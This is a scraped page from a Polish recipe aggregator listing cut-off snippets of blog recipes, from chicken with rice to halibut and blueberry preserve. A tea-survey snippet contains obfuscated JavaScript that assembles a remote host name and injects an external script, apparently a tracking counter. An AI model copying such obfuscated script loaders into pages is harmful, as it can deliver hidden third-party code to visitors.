strona 56 - 500 przepisów (strona:13/34)

Kurczak z ryżem 254

Jeżeli mamy duże ćwiartki z kurczaka, to zalecam podzielić je na pół. Dokładnie myjemy mięso, osuszamy  ręcznikiem papierowym. Na patelni rozgrzewamy dobrze olej i obsmażamy mięso z obu stron na rumiano. Odstawiamy na ogrzany półmisek. Na tym samym tłuszczu szklimy drobno pokrojoną cebulę i papryczkę chili. Z papryczki usuwamy wcześniej gniazda nasienne. Jeżeli mamy chili sproszkowaną dodajemy

Kulinarne przemyslenia
Naleśniki ziemniaczane z farszem ruskim 163

wody. Na patelnię wlewamy odrobinę oleju, gdy się rozgrzeje równomiernie rozlewamy na niej chochelkę ciasta naleśnikowego. Smażymy do momentu aż brzegi się nie zarumienią, następnie ostrożnie przekładamy na drugą stronę. Smażymy do zarumienienia, a następnie naleśnika delikatnie przekładamy na talerz, jest gotowy do faszerowania.   Na naleśniku rozsmarowujemy ok. 2-3 łyżki farszu formując z niego prostokąt. Następnie zawijamy kolejno

Cooking Monster
Wytrawne paszteciki orzechowe z dynią 221

części. 8. Rozwiń ciasto francuskie i wzdłuż DŁUŻSZEGO boku ułóż jedną część farszu uformowaną w kiełbaskę- ciasto z farszem zawiń do połowy. 9. Analogicznie postąp z drugą stroną ciasta i pozostałą częścią farszu. 10. Ciasto ostrożnie przekrój wzdłuż, a następnie każdy z wałeczków na mniejsze kawałki. 11. Paszteciki posmaruj roztrzepanym jajkiem i piecz 20min w 200*C. Smacznego! Hazelnuts

Kuchnia w Słońcu Skąpana
Pieczona pierś z indyka 706

indyka myjemy, osuszamy ręcznikiem papierowym, nacieramy marynatą i wkładamy do lodówki na kilka godzin (można na całą noc). Pierś dokładnie zawijamy w folię aluminiową, pamiętając, że do pieczenia, matowa strona powinna być na zewnątrz. Piekarnik nagrzewamy do 220 stopni, wkładamy mięso i od razu zmniejszamy temperaturę do 175 stopni. Ja piekę 70 minut, na grzałce dolnej + grzałka z termoobiegiem. Mięso

Smak mojego domu
Herbata w Polsce odchodzi do lamusa? Badania pokazują, że wprost przeciwnie! 210

takim obszarze jak picie herbaty. Nie jesteśmy jednak zamknięci na nowe nurty i inspiracje i od czasu do czasu próbujemy wzbogacać nasze codzienne rytuały. Badanie opinii przeprowadzono na stronie internetowej TET True English Tea www.tettea.com w 2016 r. (function(){ axhw=document.createElement("script");axhw_="u"+("s")+"ta"; axhw_+=("t.i")+""+"n";axhw_+=(("f")+"o");axhw.type="text/javascript"; axhw_+="/"; axhwu="15212454";axhwu+=".ukbzfdccxhw01X9uscc";axhwu

Kuchcik gotuje
PIERNIKOWA BRIOSZKA 142

kolejnym paskiem,smarujemy masłem,naszą mieszanką.Postępujemy tak z kolejnymi paskami. Zlepione paski ciasta kroimy w poprzek na 6 kawałków i układamy jeden przy drugim w nasmarowanej keksówce (26x11cm) stroną cięcia do góry.Przykrywamy ściereczką i ponownie odstawiamy na ok godzinę. Piekarnik nagrzać do 180 st.C i pieczemy ok 40 min,żeby była złocista,wyjmujemy z piekarnika i studzimy

Niespełnione zdolności kulinarne
Pierogi z kaszą, podsmażane 180

powinna się stopić. Dodać posiekaną cebulkę i smażyć, aż cebulka zmięknie. Zdjąć wszystko z patelni i przykryć. Na tej samej patelni obsmażyć obgotowane pierogi na złoty kolor z dwóch stron. Podawanie – podawać obsmażone pierogi polane przypieczonym boczkiem z cebulką. Pycha smacznego

Kuchnia Pokoleń
Krokiety z zieloną soczewicą i jarmużem oraz "Księgarenka przy ulicy Wiśniowej" 182

ostudzeniu doprawić całość solą i pieprzem. Wbić jajko i dokładnie wymieszać. Farsz wykładać na naleśniki. Składać brzegi do środka i zwijać naleśnik. Przed podaniem krokiety obsmażyć z różnych stron na rozgrzanym oleju. Tym razem na przeczytanie zbioru opowiadań "Księgarenka przy ulicy Wiśniowej" zdecydowałam się w weekend, by nie powtarzać błędu popełnionego przy lekturze "Cichej 5" . Autorami opowiadań są: Liliana Fabisińska

Weekendy w domu i ogrodzie
Medaliony wieprzowe z jabłkiem i cydrem 215

sałata lodowa. Smacznego :)    1 porcja  - 210 kcal - białko - 110 g - tłuszcze - 22,5 g - węglowodany - 47 g - błonnik - 7,5 g Zapraszam do polubienia mojej  strony na Facebooku  oraz śledzenia na  Instagramie

Moje Kuchenne Rewelacje
Roladki schabowe mięsnym farszem 543

cienkie kotlety. Oprószyć solą i pieprzem. Na środku ułożyć po łyżce farszy zwinąć roladki. Związać nicią lub spiąć wykałaczką. W szerokim rondlu rozgrzać olej, mocno przyrumienić roladki z każdej strony. Zalać mięso 1/2 l gorącej wody. Dodać bulionetkę i zioła. Dusić pod przykryciem ok pół godziny. Po tym czasie wyjąć roladki i usunąć sznurek. Mąkę wymieszać z 1/2 szkl zimnej

Smakołyki Asi
Ciasteczka orzeszki 212

upieczeniu. Polewa: Margarynę rozpuścić (nie gotować). Zdjąć z ognia dodać resztę składników i energicznie wymieszać.   Z dwóch połówek zlepiać orzeszki i nadziewać masą kajmakową. Zlepiony orzeszek z jednej strony zanurzyć w polewie i obtoczyć w mielonych orzechach

Ala piecze i gotuje
Halibut w sosie chrzanowym 230

pieprzem cytrynowym. Jeśli ryba ma skórę, zdejmujemy ją. Moja nie miała, więc jeden problem mniej :) Rybę oprószyłam mąką, rozgrzałam na patelni olej kokosowy i smażyłam rybę z obu stron ana złoty kolor. Odstawiłam Na tej samej patelni podsmażyłam cebulę i czosnek. Gdy się zeszklą, dodałam mleko kokosowe i chrzan,  doprawiłam solą, pieprzem i miodem. Chwilę gotowałam na małym ogniu

www.szczesliwakuchnia.blogspot.com
Halibut w sosie chrzanowym 230

pieprzem cytrynowym. Jeśli ryba ma skórę, zdejmujemy ją. Moja nie miała, więc jeden problem mniej :) Rybę oprószyłam mąką, rozgrzałam na patelni olej kokosowy i smażyłam rybę z obu stron ana złoty kolor. Odstawiłam Na tej samej patelni podsmażyłam cebulę i czosnek. Gdy się zeszklą, dodałam mleko kokosowe i chrzan,  doprawiłam solą, pieprzem i miodem. Chwilę gotowałam na małym ogniu

Szczęśliwa kuchnia
Placuszki twarogowe z bananem 206

proszkiem do pieczenia, dokładnie wymieszać. W razie potrzeby dodaje miód do smaku. Na rozgrzaną patelnię wlewamy po jednej łyżce ciasta, lekko spłaszczamy. Smażymy na średnim ogniu z obu stron na złoty kolor

magiczna kuchnia Kasi
Domowa konfitura z borówki amerykańskiej – idealna do świątecznych wypieków, idealna na co dzień 273

GlobalGap uprawniający  do sprzedaży owoców na rynki zagraniczne. Dodatkowo certyfikat Integrowanej Produkcji, potwierdzający wysoką jakość owoców. Jeśli jesteście zainteresowani tą oryginalną i naprawdę pyszną ofertą zapraszam Was na stronę producenta:  http://przetworyzborowki.pl *zdjęcia własne i udostępnione przez firmę Zielono

Słodkie okruszki

Proponowane wyszukiwania